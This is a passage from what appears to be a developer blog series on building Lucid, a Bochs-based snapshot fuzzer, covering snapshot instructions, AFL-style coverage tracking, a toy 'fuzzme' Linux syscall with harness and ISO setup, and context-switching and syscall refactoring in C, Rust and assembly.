87E4  | xchg sp,sp  | 1000011111 100 100 -> 4
87ED  | xchg bp,bp  | 1000011111 101 101 -> 5
87F6  | xchg si,si  | 1000011111 110 110 -> 6
87FF  | xchg di,di  | 1000011111 111 111 -> 7

This code is located in bochs/cpu/data_xfer16.cc. The bxInstruction_c struct has fields for this type of operation which track both the src register and the dst register. If they are the same, it checks them against their binary representation in the instruction encoding. For example xchg dx, dx would mean that i->src() and i->dst() both equal 2.

So in this instruction handler, we already have an example of how to implement logic to get Bochs to recognize instructions in the guest and do something.

We also have two types of snapshots really. One is when we use a regular “vanilla” version of Bochs with a GUI and what we’re aiming to do is “snapshot” the Bochs state to disk where we want to start fuzzing from. This is distinct from the snapshot that the fuzzer conceives of. So for instance, if you’ve built a harness like I have, you would want to boot up your system with Bochs in the GUI, get a shell, and finally run your harness. Your harness can then trigger one of these magic breakpoints to get Bochs to then save its state to disk, and this is what I’ve done.

Bochs has the ability to save its state to disk in the event that a user uses the “Suspend” feature, like pausing a VM. Bochs can then resume that suspended VM later in the future, great feature obviously. We can take advantage by just copy-pasta-ing that code right over to the instruction handler from where it normally lives (somewhere in the GUI simulation interface code). I think all I had to do was add an additional include to data_xfer16.cc and then hack in my logic as follows:

#if BX_SNAPSHOT
  // Check for take snapshot instruction `xchg dx, dx`
  if ((i->src() == i->dst()) && (i->src() == 2)) {
    BX_COMMIT_INSTRUCTION(i);
    if (BX_CPU_THIS_PTR async_event)
      return;
    ++i;
    char save_dir[] = "/tmp/lucid_snapshot";
    mkdir(save_dir, 0777);
    printf("Saving Lucid snapshot to '%s'...\n", save_dir);
    if (SIM->save_state(save_dir)) {
      printf("Successfully saved snapshot\n");
      sleep(2);
      exit(0);
    }
    else {
      printf("Failed to save snapshot\n");
    }
    BX_EXECUTE_INSTRUCTION(i);
  }
#endif

So if we build a vanilla Bochs with a GUI and define BX_SNAPSHOT during the build process, we should be able to make Bochs save its state to disk when it encounters a xchg dx, dx instruction as if the end-user has pressed suspend at the perfect moment down to the instruction in our harness.

Now in the fuzzer, we will tell our Bochs to resume the saved-to-disk state and right as its about to emulate its first instruction in the CPU-loop, break back into the fuzzer and take the sort of snapshot the fuzzer is going to use that we discussed in the previous section. This was done by hacking in some code in cpu/cpu.cc as follows:

jmp_buf BX_CPU_C::jmp_buf_env;

void BX_CPU_C::cpu_loop(void)
{
#if BX_SUPPORT_HANDLERS_CHAINING_SPEEDUPS
  volatile Bit8u stack_anchor = 0;

  BX_CPU_THIS_PTR cpuloop_stack_anchor = &stack_anchor;
#endif

#if BX_DEBUGGER
  BX_CPU_THIS_PTR break_point = 0;
  BX_CPU_THIS_PTR magic_break = 0;
  BX_CPU_THIS_PTR stop_reason = STOP_NO_REASON;
#endif

// Place the Lucid snapshot taking code here above potential long jump returns
#if BX_LUCID
  lucid_take_snapshot();
#endif

  if (setjmp(BX_CPU_THIS_PTR jmp_buf_env)) {
    // can get here only from exception function or VMEXIT
    BX_CPU_THIS_PTR icount++;
    BX_SYNC_TIME_IF_SINGLE_PROCESSOR(0);
#if BX_DEBUGGER || BX_GDBSTUB
    if (dbg_instruction_epilog()) return;
#endif
#if BX_GDBSTUB
    if (bx_dbg.gdbstub_enabled) return;
#endif
  }

You can see that if we have built Bochs for the fuzzer (with BX_LUCID defined), we’ll call the take snapshot function before we start emulating instructions or even return from an exception via longjmp or similar logic. The logic of the take snapshot code is very simple, we just set some variables in the global execution context to let Lucid know why we exited the VM and what it should do about it:

// Call into Lucid to take snapshot of current Bochs state
__attribute__((optimize(0))) void lucid_take_snapshot(void) {
    if (!g_lucid_ctx)
        return;

    // Set execution mode to Bochs
    g_lucid_ctx->mode = BOCHS;

    // Set the exit reason
    g_lucid_ctx->exit_reason = TAKE_SNAPSHOT;

    // Inline assembly to switch context back to fuzzer
    __asm__ (
        "push %%r15\n\t"          // Save r15 register
        "mov %0, %%r15\n\t"       // Move context pointer into r15
        "call *(%%r15)\n\t"       // Call context_switch
        "pop %%r15"               // Restore r15 register
        :                         // No output
        : "r" (g_lucid_ctx)       // Input
        : "memory"                // Clobber
    );

    return;
}

Now Lucid can save this state as a snapshot and reset to it after each fuzzing iteration, all by virtue of just including a simple xchg dx, dx instruction in your fuzzing harness, very cool stuff imo! At the end of a fuzzcase, when we’ve reset the snapshot state and we want to start executing Bochs again from the snapshot state, we just call this function via a context switch which ends with a simple ret instruction. This will behave as if Bochs is just returning from calling lucid_take_snapshot as a normal function:

// Restore Bochs' state from the snapshot
fn restore_bochs_execution(contextp: *mut LucidContext) {
    // Set the mode to Bochs
    let context = LucidContext::from_ptr_mut(contextp);
    context.mode = ExecMode::Bochs;

    // Get the pointer to the snapshot regs
    let snap_regsp = context.snapshot_regs_ptr();

    // Restore the extended state
    context.restore_xstate();

    // Move that pointer into R14 and restore our GPRs
    unsafe {
        asm!(
            "mov r14, {0}",
            "mov rax, [r14 + 0x0]",
            "mov rbx, [r14 + 0x8]",
            "mov rcx, [r14 + 0x10]",
            "mov rdx, [r14 + 0x18]",
            "mov rsi, [r14 + 0x20]",
            "mov rdi, [r14 + 0x28]",
            "mov rbp, [r14 + 0x30]",
            "mov rsp, [r14 + 0x38]",
            "mov r8, [r14 + 0x40]",
            "mov r9, [r14 + 0x48]",
            "mov r10, [r14 + 0x50]",
            "mov r11, [r14 + 0x58]",
            "mov r12, [r14 + 0x60]",
            "mov r13, [r14 + 0x68]",
            "mov r15, [r14 + 0x78]",
            "mov r14, [r14 + 0x70]",
            "sub rsp, 0x8",             // Recover saved CPU flags 
            "popfq",
            "ret",
            in(reg) snap_regsp,
        );
    }
}

That’s pretty much it for snapshots I think, curious to see how they’ll perform in the future, but they’re doing the trick now.

Code Coverage Feedback

After snapshots were settled, I moved on to implementing code coverage feedback. At first I was kind of paralyzed by the options since we have access to everything via Bochs. We know every single PC that is executed during a fuzzing iteration so really we can do whatever we want. I ended up implementing something pretty close to what old-school AFL did which tracks code coverage at two levels:

Edge pairs: These are addresses where a branch takes place. For example if the instruction at 0x1337 is a jmp 0x13371337, then we would have an edge pair of 0x1337 and 0x13371337. This combination is what we’re keeping track of. Basically what is the current PC and what PC are we branching to. This also applies when we don’t take a branch, because we skip over the branching instruction and land on a new instruction instead which in its own way is a branch.
Edge pair frequency: We also want to know how often these edge-pairs are accessed during a fuzzing iteration. So not only binary fidelity of “edge pair seen/edge pair not seen”, we also want frequency. We want to differentiate inputs that hit the edge pair 100x vs one that hits it 100000x during a fuzzing iteration. This added fidelity should provide us more valuable feedback vs. just rough data of edges hit vs not hit.

With these two levels of introspection in mind, we had to choose a way to implement this. Luckily, we can compile Bochs with instrumentation that it exposes stubs for in instrument/stubs/instrument.cc. And some of the stubs are particularly useful for us because they instrument branching instructions. So if you compile Bochs with BX_INSTRUMENTATION defined, you get those stubs compiled into the instruction handlers that handle branching instructions in the guest. They have a prototype that logs the current PC and the destination PC. I had to make some changes to the stub signature for the conditional branch not taken instrumentation because it did not track what PC would be taken and we need that information to form our edge-pair. Here is what the stub logic looked like before, and then after I modified it:

void bx_instr_cnear_branch_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {}
void bx_instr_cnear_branch_not_taken(unsigned cpu, bx_address branch_eip) {}

And I changed them to:

void bx_instr_cnear_branch_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {}
void bx_instr_cnear_branch_not_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {}

So I had to go through and change all the macro invocations in the instruction handlers to calculate a new taken PC for bx_instr_cnear_branch_not_taken, which was annoying but as far as hacking on someone else’s project goes, very easy. Here is an example from the Bochs patch file of what I changed at the call-site, you can see that I had to calculate a new variable bx_address taken in order to get a pair:

-  BX_INSTR_CNEAR_BRANCH_NOT_TAKEN(BX_CPU_ID, PREV_RIP);
+  bx_address taken = PREV_RIP + i->ilen();
+  BX_INSTR_CNEAR_BRANCH_NOT_TAKEN(BX_CPU_ID, PREV_RIP, taken);

Now we know the current PC and the PC we’re branching to in the target each time, its time to put that information to use. On the Lucid side in Rust, I have a coverage map implementation like this:

const COVERAGE_MAP_SIZE: usize = 65536;

#[derive(Clone)]
#[repr(C)]
pub struct CoverageMap {
    pub curr_map: Vec<u8>,          // The hit count map updated by Bochs
    history_map: Vec<u8>,           // The map from the previous run
    curr_map_addr: *const u8,       // Address of the curr_map used by Bochs
}

It’s a long array of u8 values where each index represents an edge-pair that we’ve hit. We pass the address of that array to Bochs so that it can set the value in the array for the edge-pair it’s currently tracking. So Bochs will encounter a branching instruction, it will have a current PC and a PC its branching to, it’ll formulate a meaningful value for it and translate that value into an index in the coverage map array of u8 values. At that index, it will increment the u8 value. This process is done by hashing the two edge addresses and then doing a logical AND operation so that we mask off the bits that wouldn’t be an index value in the coverage map. This means we could have collisions, we may have an edge-pair that yields the same hash as a second distinct edge-pair. But this is just a drawback associated with this strategy that we’ll have to accept. There are other ways of having non-colliding edge-pair tracking but it would require hash-lookups each time we encounter a branching instruction. This may be expensive, but given that we have such a slow emulator running our target code, we may eventually switch to this paradigm, we’ll see.

For the hashing algorithm I chose to use dbj2_hash which is a weird little hashing algorithm that is fast and supposedly offers some pretty good distribution (low collision rate). So all in all we do the following:

Encounter an edge-pair via an instrumented branching instruction
Hash the two edge addresses using dbj2_hash
Shorten the hash value so that it cannot be longer than coverage_map.len()
Increase the u8 value at coverage_map[hash]

This is how we update the map from Bochs:

static inline uint32_t dbj2_hash(uint64_t src, uint64_t dst) {
    if (!g_lucid_ctx)
        return 0;

    uint32_t hash = 5381;
    hash = ((hash << 5) + hash) + (uint32_t)(src);
    hash = ((hash << 5) + hash) + (uint32_t)(dst);
    return hash & (g_lucid_ctx->coverage_map_size - 1);
}

static inline void update_coverage_map(uint64_t hash) {
    // Get the address of the coverage map
    if (!g_lucid_ctx)
        return;

    uint8_t *map_addr = g_lucid_ctx->coverage_map_addr;

    // Mark this as hit
    map_addr[hash]++;

    // If it's been rolled-over to zero, make it one
    if (map_addr[hash] == 0) {
        map_addr[hash] = 1;
    }
}

void bx_instr_cnear_branch_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {
    uint64_t hash = dbj2_hash(branch_eip, new_eip);
    update_coverage_map(hash);
    //printf("CNEAR TAKEN: (0x%lx, 0x%lx) Hash: 0x%lx\n", branch_eip, new_eip, hash);
}
void bx_instr_cnear_branch_not_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {
    uint64_t hash = dbj2_hash(branch_eip, new_eip);
    update_coverage_map(hash);
    //printf("CNEAR NOT TAKEN: (0x%lx, 0x%lx) Hash: 0x%lx\n", branch_eip, new_eip, hash);
}

Now we have this array of u8 values on the Lucid side to evaluate after each fuzzing iteration. On the Lucid side we need to do a few things:

We need to categorize each u8 into what’s called a bucket, which is just a range of hits for the edge-pair. For example, hitting the edge-pair 100 times is not much different from hitting the same edge-pair 101 times, so we logically bucket those two types of coverage data together. They are the same as far as we’re concerned. What we really want are drastic differences. So if we see an edge-pair 1 time vs 1000 times, we want to know that difference. I stole the bucketing logic straight from AFL++ which has empirically tested the best bucketing strategies to get the most valuable feedback for most targets.
After we transform the raw hit counts to bucket values instead, we’ll want to see if we see any new bucket counts that we haven’t seen before. This means we’ll need to keep a copy of the coverage map around at all times as well. We will walk both of them together. If the current coverage map now has a higher u8 value for an edge-pair than the old coverage map (historical one that tracks all time highs for each index), then we have new coverage results we’re interested in!

You can see that logic here:

    // Roughly sort ranges of hitcounts into buckets, based on AFL++ logic
    #[inline(always)]
    fn bucket(hitcount: u8) -> u8 {
        match hitcount {
            0 => 0,
            1 => 1,
            2 => 2,
            3 => 4,
            4..=7 => 8,
            8..=15 => 16,
            16..=31 => 32,
            32..=127 => 64,
            128..=255 => 128,
        }
    }

    // Walk the coverage map in tandem with the history map looking for new
    // bucket thresholds for hitcounts or brand new coverage
    //    
    // Note: normally I like to write things as naively as possible, but we're
    // using chained iterator BS because the compiler spits out faster code
    pub fn update(&mut self) -> (bool, usize) {
        let mut new_coverage = false;
        let mut edge_count = 0;

        // Iterate over the current map that was updated by Bochs during fc
        self.curr_map.iter_mut()                         

            // Use zip to add history map to the iterator, now we get tuple back
            .zip(self.history_map.iter_mut())

            // For the tuple pair
            .for_each(|(curr, hist)| {

                // If we got a hitcount of at least 1
                if *curr > 0 {

                    // Convert hitcount into bucket count
                    let bucket = CoverageMap::bucket(*curr);

                    // If the old record for this edge pair is lower, update
                    if *hist < bucket {
                        *hist = bucket;
                        new_coverage = true;
                    }

                    // Zero out the current map for next fuzzing iteration
                    *curr = 0;
                }
            });

        // If we have new coverage, take the time to walk the map again and 
        // count the number of edges we've hit
        if new_coverage {
            self.history_map.iter().for_each(|&hist| {
                if hist > 0 {
                    edge_count += 1;
                }
            });
        } 

        (new_coverage, edge_count)
    }

That’s pretty much it for code coverage feedback, Bochs updates the map from instrumentation hooks in branching instruction handlers, and then Lucid analyzes the results at the end of a fuzzing iteration and clears the map for the next run. Stolen directly from the AFL universe.

Environment/Target Setup

Getting a target setup for a full-system snapshot fuzzer is always going to be a pain. It is going to be so specific to your needs and having a generic way to do this type of thing does not exist. It’s essentially the problem of harnessing which remains unsolved generically. This is where all of the labor is for the end-user of a fuzzer. This is also where all the fun is though, lobotimizing your target so that it can be fuzzed is some of the funnest hacking I’ve ever done.

For Lucid, we need something Bochs can understand. Turns out it can run and boot iso files pretty easily, and since I’m mostly interested in fuzzing Linux kernel stuff, I decided to make a custom kernel and compile it into an iso to fuzz with Lucid. This worked extremely well and was very easy once I got the hang of creating iso files. As for a mature workflow, I think with this type of thing specifically, I would try to do the following:

Iteratively develop your harness/setup in QEMU-system since its faster, more mature, easier to use etc
Once completely done with your harness/setup, compile that setup to an .iso and run it in Lucid for fuzzing

That’s at least what I’ll be doing for Linux kernel stuff.

I developed a fun little toy syscall to fuzz as follows:

// Crash the kernel
void __crash(void)
{
	asm volatile("xchgw %sp, %sp");
	*(int *)0 = 0;
}

// Check to see if the input matches our criteria
void inspect_input(char *input, size_t data_len) {
	// Make sure we have enough data
	if (data_len < 6)
		return;
	
	if (input[0] == 'f')
		if (input[1] == 'u')
			if (input[2] == 'z')
				if (input[3] == 'z')
					if (input[4] == 'm')
						if (input[5] == 'e')
							__crash();

	return;
}

SYSCALL_DEFINE2(fuzzme, void __user *, data, size_t, data_len)
{
	char kernel_copy[1024] = { 0 };
	printk("Inside fuzzme syscall\n");

	// Make sure we don't overflow stack buffer
	if (data_len > 1024)
		data_len = 1024;

	// Copy the user data over
	if (copy_from_user(kernel_copy, data, data_len))
	{
		return -EFAULT;
	}

	// Inspect contents to try and crash
	inspect_input(kernel_copy, data_len);
	
	return 0;
}

I just added a new syscall to the kernel called fuzzme that has a syscall number of 451 and then I just compile a harness and stuff that in /usr/bin/harness on the disk of the iso. I didn’t try to generically find a way to plumb up crashes to Lucid yet, I just put the special NOP instruction for signaling a crash instead in the __crash function. But with things like KASAN, I’m sure there will be some chokepoint I can use in the future as a catch all for crashes. Weirdly detecting crashes is not a trivial problem from the Bochs host level like it is when the kernel sends your program a signal (obviously some kernel oops will signal your harness if you build it this way).

The harness was simple and was just the following:

#include 
#include 
#include 

#define __NR_fuzzme 451

#define LUCID_SIGNATURE { 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, \
                          0x13, 0x38, 0x13, 0x38, 0x13, 0x38, 0x13, 0x38 }

#define MAX_INPUT_SIZE 1024UL

struct fuzz_input {
    unsigned char signature[16];
    size_t input_len;
    char input[MAX_INPUT_SIZE];
};

int main(int argc, char *argv[])
{
    struct fuzz_input fi = { 
        .signature = LUCID_SIGNATURE,
        .input_len = 8,
    };
    memset(&fi.input[0], 'A', 8);

    // Create snapshot
    asm volatile("xchgw %dx, %dx");

    // Call syscall we're fuzzing
    long ret = syscall(__NR_fuzzme, fi.input, *(size_t *)&fi.input_len);

    // Restore snapshot
    asm volatile("xchgw %bx, %bx");

    if (ret != 0) {
        perror("Syscall failed");
    } else {
        printf("Syscall success\n");
    }

    return 0;
}

I create a 128-bit signature value that Lucid can scan for in Bochs heap memory and learn the dimensions of the fuzzing input. Once I find the signature, I can insert inputs into Bochs from Lucid. This is also probably doable by using some Bochs logic to translate guest linear addresses to the physical memory in the host Bochs and then plumb those values up via GPR during the snapshot, but I haven’t done a lot of work there yet. This way also seems pretty generic? I’m not sure what people will prefer, we’ll see.

You can see the special NOP instructions for taking a snapshot and then restoring a snapshot. So we really only fuzz the syscall portion of the harness.

I basically followed this tutorial for building an iso with BusyBox: https://medium.com/@ThyCrow/compiling-the-linux-kernel-and-creating-a-bootable-iso-from-it-6afb8d23ba22. I compiled the harness statically and then copied that into /usr/bin/harness and then I can run that from vanilla Bochs with a GUI to save Bochs state to disk at the snapshot point we want to fuzz from.

I added my custom syscall to the Linux kernel at kernel/sys.c at the bottom of the source file for kernel version 6.0.1, and I added the harness to /usr/bin/harness in the initramfs from the tutorial. My file hierarchy for the iso when I went to create it is:

iso_files
  - boot
    - bzImage
    - initramfs.cpio.gz
    - grub
      - grub.cfg

bzImage is the compiled kernel image. initramfs.cpio.gz is the compressed initramfs file system we want in the virtual machine, you can create that by navigating to its root and doing something like find . | cpio -o -H newc | gzip > /path/to/iso_files/boot/initramfs.cpio.gz.

The contents of my grub.cfg file looked like this:

set default=0
set timeout=10
menuentry 'Lucid Linux' --class os {
    insmod gzio
    insmod part_msdos
    linux /boot/bzImage
    initrd /boot/initramfs.cpio.gz
}

Pointing grub-mkrescue at the iso_files dir will have it spit out the iso we want to run in Bochs: grub-mkrescue -o lucid_linux.iso iso_files/.

Here is what everything looks like from start to finish when you run the environment:

devbox:~/git_bochs/Bochs/bochs]$ /tmp/gui_bochs -f bochsrc_gui.txt
========================================================================
                     Bochs x86 Emulator 2.8.devel
             Built from GitHub snapshot after release 2.8
                  Compiled on Jun 21 2024 at 14:42:29
========================================================================
00000000000i[      ] BXSHARE not set. using compile time default '/usr/local/share/bochs'
00000000000i[      ] reading configuration from bochsrc_gui.txt
------------------------------
Bochs Configuration: Main Menu
------------------------------

This is the Bochs Configuration Interface, where you can describe the
machine that you want to simulate.  Bochs has already searched for a
configuration file (typically called bochsrc.txt) and loaded it if it
could be found.  When you are satisfied with the configuration, go
ahead and start the simulation.

You can also start bochs with the -q option to skip these menus.

1. Restore factory default configuration
2. Read options from...
3. Edit options
4. Save options to...
5. Restore the Bochs state from...
6. Begin simulation
7. Quit now

Please choose one: [6] 

We’ll want to just being simulation, so enter 6 here. When we do, we should eventually be booted into this screen for GRUB to choose what to boot into, we just select Lucid Linux:

Once we boot and get our shell, I just have to call harness from the command line since its automatically in my $PATH and save the Bochs state to disk!

Please choose one: [6] 6
00000000000i[      ] installing sdl2 module as the Bochs GUI
00000000000i[SDL2  ] maximum host resolution: x=1704 y=1439
00000000000i[      ] using log file bochsout.txt
Saving Lucid snapshot to '/tmp/lucid_snapshot'...
Successfully saved snapshot

Now, /tmp/lucid_snapshot has all of the information to resume this saved Bochs state inside Lucid’s Bochs. We just need to go and comment out the display library line from /tmp/lucid_snapshot/config as follows:

# configuration file generated by Bochs
plugin_ctrl: unmapped=true, biosdev=true, speaker=true, extfpuirq=true, parallel=true, serial=true, e1000=false
config_interface: textconfig
#display_library: sdl2

Next, we just have to run Lucid and give it the right Bochs arguments to resume that saved state from disk: ./lucid --input-signature 0x13371337133713371338133813381338 --verbose --bochs-image /tmp/lucid_bochs --bochs-args -f /home/h0mbre/git_bochs/Bochs/bochs/bochsrc_nogui.txt -q -r /tmp/lucid_snapshot

Here are the contents of those configuration files, both for the GUI vanilla Bochs, and the one we pass here to Lucid’s Bochs, the only difference is the commented out display library line:

romimage: file="/home/h0mbre/git_bochs/Bochs/bochs/bios/BIOS-bochs-latest"
vgaromimage: file="/home/h0mbre/git_bochs/Bochs/bochs/bios/VGABIOS-lgpl-latest"
pci: enabled=1, chipset=i440fx
boot: cdrom
ata0-master: type=cdrom, path="/home/h0mbre/custom_linux/lucid_linux.iso", status=inserted
log: bochsout.txt
clock: sync=realtime, time0=local
cpu: model=corei7_skylake_x
cpu: count=1, ips=750000000, reset_on_triple_fault=1, ignore_bad_msrs=1
cpu: cpuid_limit_winnt=0
memory: guest=64, host=64
#display_library: sdl2

Really not much to it, you just have to put the iso in the right device and say that it’s inserted and you should be good to go. We can actually fuzz stuff now!

Conclusion

Now that its conceivable we can fuzz stuff with this now, there is a lot of small changes that need to take place that I will work on in the future:

Mutator: Right now there is a stand-in toy mutator for demo purposes, and I think we actually won’t do any mutation stuff on this blog. I’ll probably add Brandon’s basic mutator to the fuzzer as the default, but I think I can make it bring your input generator fairly easily with Rust traits, we’ll see on that. Maybe that will be a blogpost who knows.
Corpus mangagement: Right now there is none! That should be fairly trivial to do however, not worth a blogpost
Parallelization: This will be a fun blogpost I think, I’d like the fuzzer to be easily parallelizable and maybe distributed across nodes. I’d like to get this thing fuzzing on my servers I bought a few years ago and never used lol.
Redqueen: We have such easy access to the relevant instructions that we have to implement this feature, it’s a huge boost to efficiency.
LibAFL Integration: This will definitely be a blogpost, we want this to eventually serve as the execution engine for LibAFL.

Maybe in the next blogpost, we’ll try to fuzz a real target and find an N-Day? That would be fun if the input generation aspect isn’t too much labor. Let me know what you want to see, until next time.

Fuzzer Development 3: Building Bochs, MMU, and File I/0

2024-03-05T00:00:00+00:00

Background

Introduction

We’re continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.

In this post, we’re going to go over some changes and advancements we’ve made to the fuzzer and also document some progress related to Bochs itself.

Syscall Infrastructure Update

After putting out the last blogpost, I got some really good feedback and suggestions by Fuzzing discord legend WorksButNotTested, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-Syscall-ABI-Register-Translation routines all together and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight and I’m admittedly a little embarrassed to have overlooked this possibility.

Previously, in our custom Musl code, we would have a C function call like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

This is the function that is called when the program needs to make a syscall with 6 arguments. In the previous blog, we changed this function to be an if/else such that if the program was running under Lucid, we would instead call into Lucid’s context-switch function after shuffling the C ABI registers to Syscall registers like so:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
    
    __asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );
	
	return ret;
}

So this was quite involved. I was very fixated on the idea that “Lucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernel”. This proved to lead me astray since such a complicated routine is not needed for our purposes, we are not actually a kernel, we just want to sandbox away syscalls for one specific program who behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (g_lucid_syscall)
		return g_lucid_syscall(g_lucid_ctx, n, a1, a2, a3, a4, a5, a6);
	
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

Obviously this is a much simpler solution and we get to avoid scrambling registers/saving state/inline-assembly and the rest of it. To set this function up, we just simply created a new function pointer global variable in lucid.h in Musl and gave it a definition in src/lucid.c which can you see in the Musl patches in the repo. g_lucid_syscall looks like this on the Rust side:

pub extern "C" fn lucid_syscall(contextp: *mut LucidContext, n: usize,
    a1: usize, a2: usize, a3: usize, a4: usize, a5: usize, a6: usize)
    -> u64 

We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl, and it’s just a very much appreciated suggestion and I couldn’t be happier with how it turned out.

Calling Convention Changes

During this refactoring for syscalls, I also simplified the way our context-switching calling convention would work. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the context_switch function itself work out how it should behave based on the context’s values. In essence, we’re moving complexity from the caller-side to the callee-side. This means that the complexity doesn’t keep recurring throughout the codebase, it is encapsulated one time, in the context_switch logic itself. This does require some hacky/brittle code however, for instance we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay in my opinion for drastically reduced complexity. The context_switch code has been changed to the following

extern "C" { fn context_switch(); }
global_asm!(
    ".global context_switch",
    "context_switch:",

    // Save the CPU flags before we do any operations
    "pushfq",

    // Save registers we use for scratch
    "push r14",
    "push r13",

    // Determine what execution mode we're in
    "mov r14, r15",
    "add r14, 0x8",     // mode is at offset 0x8 from base
    "mov r14, [r14]",
    "cmp r14d, 0x0",
    "je save_bochs",

    // We're in Lucid mode so save Lucid GPRs
    "save_lucid: ",
    "mov r14, r15",
    "add r14, 0x10",    // lucid_regs is at offset 0x10 from base
    "jmp save_gprs",             

    // We're in Bochs mode so save Bochs GPRs
    "save_bochs: ",
    "mov r14, r15",
    "add r14, 0x90",    // bochs_regs is at offset 0x90 from base
    "jmp save_gprs",

You can see that once we hit the context_switch function we save the CPU flags before we do anything that would affect them, then we save a couple of registers that we use as scratch registers. Then we’re free to check the value of context->mode in order to determine what mode of execution we’re in. Based on that value, we are able to know what register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe overall this is a much better API and system for context-switching callees and the data-structure itself should be relatively stable at this point and not require massive refactoring.

Introducing Faults

Since the last blog-post, I’ve introduced the concept of Fault which is an error class that is reserved for instances when some sort of error is encountered during either context-switching code or syscall-handling. This error is distinct from our highest-level error LucidErr. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid calls any Fault fatal.

We are able to plumb these back up to Lucid because before starting Bochs execution we now save Lucid’s state and context-switch into starting Bochs:

#[inline(never)]
pub fn start_bochs(context: &mut LucidContext) {
    // Set the execution mode and the reason why we're exiting the Lucid VM
    context.mode = ExecMode::Lucid;
    context.exit_reason = VmExit::StartBochs;

    // Set up the calling convention and then start Bochs by context switching
    unsafe {
        asm!(
            "push r15", // Callee-saved register we have to preserve
            "mov r15, {0}", // Move context into R15
            "call qword ptr [r15]", // Call context_switch
            "pop r15",  // Restore callee-saved register
            in(reg) context as *mut LucidContext,
        );
    }
}

We make some changes to the execution context, namely marking the execution mode (Lucid-mode) and setting the reason why we’re context-switching (to start Bochs). Then in the inline assembly, we call the function pointer at offset 0 in the execution context structure:

// Execution context that is passed between Lucid and Bochs that tracks
// all of the mutable state information we need to do context-switching
#[repr(C)]
#[derive(Clone)]
pub struct LucidContext {
    pub context_switch: usize,  // Address of context_switch()

So then our Lucid state is saved in the context_switch routine and we are then passed to this logic:

// Handle Lucid context switches here
    if LucidContext::is_lucid_mode(context) {
        match exit_reason {
            // Dispatch to Bochs entry point
            VmExit::StartBochs => {
                jump_to_bochs(context);
            },
            _ => {
                fault!(context, Fault::BadLucidExit);
            }
        }
    }

Finally, we call jump_to_bochs:

// Standalone function to literally jump to Bochs entry and provide the stack
// address to Bochs
fn jump_to_bochs(context: *mut LucidContext) {
    // RDX: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // RAX: arbitrarily used as a jump target to the program entry
    //
    // RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // R15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) (*context).bochs_rsp,
            in(reg) context,
            in("rax") (*context).bochs_entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

Full-blown context-switching like this, allows us to encounter a Fault and then pass that error back to Lucid for handling. In the fault_handler, we set the Fault type in the execution context, and then we attempt to restore execution back to Lucid:

// Where we handle faults that may occur when context-switching from Bochs. We
// just want to make the fault visible to Lucid so we set it in the context,
